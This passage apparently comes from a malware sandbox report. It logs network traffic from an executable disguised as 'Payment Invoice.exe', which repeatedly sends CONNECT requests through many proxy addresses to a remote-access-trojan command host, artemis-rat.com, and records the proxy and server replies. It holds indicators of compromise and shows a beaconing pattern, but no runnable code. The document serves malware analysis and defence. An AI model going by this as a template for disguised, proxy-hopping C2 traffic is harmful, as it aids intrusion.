                                                                Mar 11, 2024 16:15:14.516520023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.815757990 CET65INHTTP/1.1 200 Connection Established
                                                                Proxy-Agent: Zscaler/6.3


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                86192.168.2.45013123.227.38.198807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.533888102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.688114882 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                87192.168.2.450050121.159.146.251807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.564112902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                88192.168.2.450093192.252.208.70142827076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.564116955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                89192.168.2.450145104.20.123.164807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.564322948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.718523026 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                90192.168.2.450085174.64.199.7941457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.564666986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                91192.168.2.450166172.67.182.0807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.565483093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.719985962 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                92192.168.2.450163104.21.194.182807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.568315029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.722609043 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                93192.168.2.45003995.164.89.12388887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.569427967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                94192.168.2.450182104.16.143.127807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.593530893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.747785091 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                95192.168.2.450018120.37.121.20990917076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.601697922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.988464117 CET325INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.12.1
                                                                Date: Mon, 11 Mar 2024 15:15:05 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 173
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                96192.168.2.450074167.249.29.2189997076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.602082014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.261048079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.198569059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.486824989 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                97192.168.2.45018980.251.219.4031287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.604011059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.026654959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.496303082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.505579948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.386528969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.279191017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.248929024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.183305979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.757798910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:49.778894901 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                98192.168.2.450073222.255.238.159807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.604083061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.930205107 CET481INHTTP/1.1 302 Found
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Location: https://ktxcomay.com.vn
                                                                Content-Length: 289
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 74 78 63 6f 6d 61 79 2e 63 6f 6d 2e 76 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://ktxcomay.com.vn">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                99192.168.2.45012467.43.228.25378537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.604091883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                100192.168.2.450185132.148.245.24771837076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.607372999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                101192.168.2.45014267.43.228.251242797076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.607757092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.622896910 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                102192.168.2.450058103.231.248.9831287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.611308098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.323538065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.354810953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.511398077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.714731932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.823939085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.027084112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                103192.168.2.45014872.10.164.17814317076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.619280100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.402347088 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                104192.168.2.450227172.67.150.173807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.631149054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.785293102 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                105192.168.2.450239104.20.24.214807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.632755041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.786861897 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                106192.168.2.450245172.67.38.96807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.636106014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.790548086 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
